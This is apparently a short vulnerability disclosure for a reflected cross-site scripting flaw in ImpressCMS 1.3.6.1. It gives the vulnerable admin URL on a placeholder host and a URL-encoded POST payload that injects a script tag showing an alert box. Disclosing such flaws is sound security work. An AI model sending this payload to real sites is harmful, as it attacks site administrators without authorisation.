# Exploit Title: ImpressCMS 1.3.6.1 Reflected XSS
# Date: 05/28/2014
# Author: Mustafa ALTINKAYNAK
# Download URL : http://www.impresscms.org
# Software Link: http://www.impresscms.org/content.php?page=Download
# Vuln Category: CWE-79 (XSS)
# Tested on: ImpressCMS 1.3.6.1
# Tested Local Platform : XAMP on Windows 8
# Patch/ Fix: Not published.
---------------------------
 
Technical Details
---------------------------
	http://www.target.com/modules/system/admin.php?fct=images&op=listimg&imgcat_id=1
		POST {query=%22%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E} 
---------------------------
Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <http://twitter.com/m_altinkaynak>
www.mustafaaltinkaynak.com